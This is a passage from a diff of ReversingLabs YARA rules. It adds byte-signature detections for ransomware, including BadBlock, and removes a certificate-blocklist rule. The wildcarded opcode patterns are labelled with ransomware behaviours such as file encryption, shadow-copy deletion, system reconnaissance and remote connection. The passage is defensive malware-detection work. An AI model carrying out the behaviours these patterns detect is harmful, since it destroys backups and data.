+            C6 00 ?? 8D 40 ?? 83 E9 ?? 75 ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50
+            FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
+            FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D6 83 C4 ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 0F 57 C0 8B 85 ?? ?? ?? ?? 8B
+            8D ?? ?? ?? ?? 0F AC C6 ?? 8B 85 ?? ?? ?? ?? 0F AC C1 ?? 6A ?? 66 0F 13 85 ?? ?? ??
+            ?? 6A ?? 89 B5 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 89 BD
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ??
+            50 6A ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 0F B6 05 ?? ?? ?? ?? 83 BD
+            ?? ?? ?? ?? ?? 0F 45 C3 A2 ?? ?? ?? ?? 33 F6 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 4E ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F
+            84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4E ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? FF D3 68 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B F0 33
+            C0 85 F6 0F 44 C8 8D 85 ?? ?? ?? ?? 50 51 56 6A ?? FF B5 ?? ?? ?? ?? 89 8D ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 0F 1F 44 00 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 85
+            F6 74 ?? 56 6A ?? FF D3 50 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? FF D3 56 6A ?? 50 FF
+            15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? 56 6A ?? FF
+            B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? EB ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89
+        }
+		$get_system_information_p3 = {
+            B5 ?? ?? ?? ?? 33 DB 3B 1E 0F 83 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 74 DE ?? FF 15 ??
+            ?? ?? ?? 85 C0 74 ?? C6 05 ?? ?? ?? ?? ?? EB ?? FF B5 ?? ?? ?? ?? FF 74 DE ?? FF 15
+            ?? ?? ?? ?? 85 C0 74 ?? F6 44 DE ?? ?? B9 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 0F 45 C1
+            A2 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66
+            89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ??
+            ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B 54 DE ?? 8B 4C DE ?? 50 E8 ?? ?? ?? ?? 8B 47 ??
+            8D 8D ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 51 50 57 E8 ?? ?? ?? ?? 8B 95 ?? ?? ??
+            ?? B9 ?? ?? ?? ?? 2B CA 83 F9 ?? 0F 82 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 42 89 47 ?? 89
+            95 ?? ?? ?? ?? 89 01 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 43 E9 ?? ??
+            ?? ?? 8B 8D ?? ?? ?? ?? 8B 01 FF 50 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
+            ?? 8D 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03
+            C1 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 51 50 51 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? FF 15 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? 50 0F 43 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ??
+            8B 8D ?? ?? ?? ?? 83 F9 ?? 72 ?? 8B 85 ?? ?? ?? ?? 8D 0C 4D ?? ?? ?? ?? 81 F9 ?? ??
+            ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 8B C2 51 50
+        }
+		$get_system_information_p4 = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C6 45 ?? ?? 8B 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 F9 ?? 72 ?? 8B 85 ?? ??
+            ?? ?? 41 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ??
+            ?? ?? ?? 8B C2 51 50 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? C3 8B 85 ?? ?? ?? ?? BB
+            ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? 8B BD ?? ?? ?? ?? 89 85 ?? ?? ?? ?? EB ?? BB ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 85
+            F6 74 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 35 ??
+            ?? ?? ?? 85 C0 74 ?? 50 FF D6 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 50 FF D6 FF B5 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? 8B CA C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 85 ??
+            ?? ?? ?? 8D 41 ?? 89 85 ?? ?? ?? ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B 8D ?? ?? ??
+            ?? D1 F9 51 52 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 83 BD
+            ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 0F B6 0D ??
+            ?? ?? ?? 85 C0 8B 85 ?? ?? ?? ?? 0F 45 CB A3 ?? ?? ?? ?? 66 83 BD ?? ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 0F 95 05 ?? ?? ?? ?? 88 0D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 0F 94 05 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15
+        }
+		$everything_library_setup_p1 = {
+            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
+            ?? 64 A1 ?? ?? ?? ?? 50 53 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 57 50 8D 45 ??
+            64 A3 ?? ?? ?? ?? 88 55 ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 80 7D ?? ?? 74 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 6A ??
+            6A ?? B2 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF D6 33 D2 C6 45
+            ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ??
+            ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8B
+            35 ?? ?? ?? ?? 0F 43 45 ?? 50 FF D6 85 C0 74 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? B0 ??
+            E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B D0 C7 45 ?? ?? ?? ?? ??
+            8B CA C7 45 ?? ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 45 ?? 8D 79 ?? 66 8B 01 83 C1 ?? 66
+            85 C0 75 ?? 2B CF D1 F9 51 52 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ??
+            C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 0F 10 4D ?? 8D 4D ?? F3
+        }
+		$everything_library_setup_p2 = {
+            0F 7E 45 ?? C6 45 ?? ?? 83 7D ?? ?? FF 75 ?? 66 0F 7E C8 0F 11 4D ?? 0F 43 C8 66 0F
+            D6 45 ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83
+            7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 FF D6 85 C0 74 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? B0
+            ?? EB ?? 8A 45 ?? C6 05 ?? ?? ?? ?? ?? 84 C0 74 ?? 83 7D ?? ?? 8D 4D ?? 0F 43 4D ??
+            32 D2 E8 ?? ?? ?? ?? 8A C8 88 4D ?? 84 C9 75 ?? B2 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8A C8 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 33 D2 84 C9 88 4D ?? 0F 44
+            C2 A2 ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA
+            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ??
+            ?? 83 C4 ?? 8B 55 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 83
+            FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83
+            C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8A 45 ?? 8B 4D ??
+            64 89 0D ?? ?? ?? ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D 8B E3 5B C3
+        }
+		$delete_shadow_copies_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
+            45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F
+            88 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ??
+            ?? 85 C0 0F 88 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 6A ?? 6A ??
+            68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF D6 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 68 ?? ??
+            ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF D6 85 C0 0F 88 ?? ?? ?? ?? 8D 45 ?? 50 FF 15 ??
+            ?? ?? ?? 80 3D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? B8 ?? ?? ??
+            ?? 0F 45 C1 8D 4D ?? 89 45 ?? 8B 45 ?? 68 ?? ?? ?? ?? 8B 00 8B 70 ?? E8 ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? 8B 00 85 C0 74 ?? 8B 00 EB ?? 33 C0 8D 4D ?? 51 6A ?? 50 FF 75
+            ?? FF D6 C7 45 ?? ?? ?? ?? ?? 83 CF ?? 8B 75 ?? 89 45 ?? 85 F6 74 ?? 8B CF F0 0F C1
+            4E ?? 49 75 ?? 85 F6 74 ?? 8B 06 85 C0 74 ?? 50 FF 15 ?? ?? ?? ?? C7 06 ?? ?? ?? ??
+            8B 46 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ?? ?? ?? 6A ?? 56 E8 ??
+            ?? ?? ?? 83 C4 ?? 8B 1D ?? ?? ?? ?? 8D 45 ?? 50 FF D3 83 7D ?? ?? 0F 8C ?? ?? ?? ??
+        }
+		$delete_shadow_copies_p2 = {
+            8B 45 ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 00 8B 70 ?? 8B 45 ?? 89 45
+            ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 00 85 C0 74 ?? 8B 00 EB ?? 33 C0 8D 4D ??
+            51 FF 75 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 50 FF 75 ?? FF D6 C7 45 ?? ?? ?? ?? ?? 8B
+            75 ?? 89 45 ?? 85 F6 74 ?? 8B CF F0 0F C1 4E ?? 49 75 ?? 85 F6 74 ?? 8B 06 85 C0 74
+            ?? 50 FF 15 ?? ?? ?? ?? C7 06 ?? ?? ?? ?? 8B 46 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? C7 46 ?? ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 85 C0 78 ?? 6A
+            ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 8B 45 ?? 79
+            ?? 8B 08 50 FF 51 ?? 8B 45 ?? 50 8B 08 FF 51 ?? FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 8B 00 68 ?? ?? ?? ?? 8B 40 ?? 89 45 ?? E8 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 8B 30 85 F6 74 ?? 8B 36 EB ?? 33 F6 68 ?? ?? ?? ?? 8D 4D ??
+            E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 00 85 C0 74 ?? 8B 00 EB ?? 33 C0 8D 4D ?? 51 6A ?? 6A
+            ?? 56 50 FF 75 ?? FF 55 ?? 8B 75 ?? 89 45 ?? 85 F6 74 ?? 8B CF F0 0F C1 4E ?? 49 75
+            ?? 85 F6 74 ?? 8B 06 85 C0 74 ?? 50 FF 15 ?? ?? ?? ?? C7 06 ?? ?? ?? ?? 8B 46 ?? 85
+            C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 83
+        }
+		$delete_shadow_copies_p3 = {
+            C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 75 ?? 85 F6 74 ?? F0 0F C1 7E ??
+            4F 75 ?? 85 F6 74 ?? 8B 06 85 C0 74 ?? 50 FF 15 ?? ?? ?? ?? C7 06 ?? ?? ?? ?? 8B 46
+            ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ??
+            ?? 83 C4 ?? 83 7D ?? ?? 7D ?? 8B 45 ?? 50 8B 08 FF 51 ?? 8B 45 ?? E9 ?? ?? ?? ?? 8B
+            4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 85 C9 74 ?? 8B 01 8D 55 ?? 52 8D 55
+            ?? 52 6A ?? 6A ?? 51 FF 50 ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 8D 55 ?? 6A ?? 6A ?? 52 8B
+            01 6A ?? 68 ?? ?? ?? ?? 51 FF 50 ?? 85 C0 78 ?? 8B 4D ?? 6A ?? 6A ?? 6A ?? FF 75 ??
+            8B 01 51 FF 50 ?? 85 C0 78 ?? FF 75 ?? 68 ?? ?? ?? ?? EB ?? 50 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 FF D3 8B 45 ?? 50 8B 08 FF 51 ?? 8B 4D ?? 85 C9 75 ??
+            8B 4D ?? 85 C9 74 ?? 8B 01 51 FF 50 ?? 8B 45 ?? 50 8B 08 FF 51 ?? 8B 45 ?? 50 8B 08
+            FF 51 ?? 8B 45 ?? 8B 08 50 FF 51 ?? FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8B 4D ?? 64 89
+            0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KBK, OOO" and pe.signatures [ i ] . serial == "4b:47:d1:8d:be:a5:7a:bd:15:63:dd:f8:9f:87:a6:c2" and 1590485607 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $write_console_log_p* ) ) and ( all of ( $get_system_information_p* ) ) and ( all of ( $everything_library_setup_p* ) ) and ( all of ( $delete_shadow_copies_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Be41E2C7Bb2493044B9241Abb732599D : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Badblock : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects BadBlock ransomware."
 		author = "ReversingLabs"
-		id = "81e5a8f3-0893-534a-ab4f-5c2c47078b40"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "a5afb7d6-4bc1-5465-a35d-fe40e7f11c3e"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4178-L4196"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.BadBlock.yara#L1-L100"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "eb5d94b80fd030d14dc26878895c61761825f3c77209ca0280e88dcd1800f9c2"
+		logic_hash = "421e6a3772eeec6ef0cbb2427b7e044b450a2b2146cee2ca7d8c3a3a92918557"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "BadBlock"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files = {
+            55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 89 5D ?? 89 5D ?? 89 4D ?? 89 55 ?? 8B D8
+            8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? 8B 45 ??
+            8B 40 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C3 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 55
+            ?? 8B 45 ?? 8B 40 ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45
+            ?? B2 ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D
+            45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ??
+            ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B D0 8B 45 ?? 85 C0 74 ?? 83 E8 ?? 8B 00 6A ?? 50 52
+            8B 45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8B 45 ?? 50
+            E8 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20
+            6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 FF 12 89 45 ?? 89 55 ?? E9 ?? ??
+            ?? ?? 83 7D ?? ?? 75 ?? 81 7D ?? ?? ?? ?? ?? 73 ?? EB ?? 7D ?? 8B 45 ?? 89 45 ?? 8B
+            45 ?? 89 45 ?? EB ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B D8 8B C3
+            E8 ?? ?? ?? ?? 8B F0 8B D6 8B CB 8B 45 ?? 8B 38 FF 57 ?? 89 45 ?? 8B 45 ?? 8B 10 FF
+            12 52 50 8B 45 ?? E8 ?? ?? ?? ?? 3B 54 24 ?? 75 ?? 3B 04 24 5A 58 72 ?? EB ?? 5A 58
+            7C ?? 8B 45 ?? 50 8D 45 ?? 50 56 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? EB ??
+            8B 45 ?? 50 8D 45 ?? 50 56 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? E8
+            ?? ?? ?? ?? 52 50 8B C3 99 29 04 24 19 54 24 ?? 58 5A 52 50 8B 45 ?? E8 ?? ?? ?? ??
+            8B D6 8B 4D ?? 8B 45 ?? 8B 38 FF 57 ?? 8B C3 99 29 45 ?? 19 55 ?? 8B D3 8B C6 E8 ??
+            ?? ?? ?? 83 7D ?? ?? 75 ?? 83 7D ?? ?? 0F 87 ?? ?? ?? ?? EB ?? 0F 8F ?? ?? ?? ?? A1
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B
+            48 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? A1 ?? ?? ?? ?? 8B 00 8B 80 ??
+            ?? ?? ?? 8B 80 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 18 FF 53 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33
+            C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
+            ?? E8 ?? ?? ?? ?? EB ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ??
+            ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ??
+            EB ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$search_files = {
+            55 8B EC 81 C4 ?? ?? ?? ?? 53 56 57 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D
+            ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 55 ?? 89 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
+            89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B
+            55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 85 C0 0F 94 C3 E9 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 66 83 38 ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            85 C0 75 ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 85 ??
+            ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 0D ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 66
+            83 38 ?? 74 ?? B9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0
+            75 ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
+            8B C6 8B 08 FF 51 ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 94 C3 84 DB 0F 85 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C6 8B 10 FF 52 ?? 8B D8 4B 85 DB 7C ??
+            43 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C6 8B 38 FF
+            57 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? FF 85 ?? ?? ?? ?? 4B 75 ?? 8B C6 E8 ?? ?? ?? ?? 33 C0 5A 59 59
+            64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3
+        }
+		$remote_connection = {
+            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ??
+            8D 4D ?? 8B 45 ?? 8B 90 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 08 FF
+            51 ?? 8B 45 ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ??
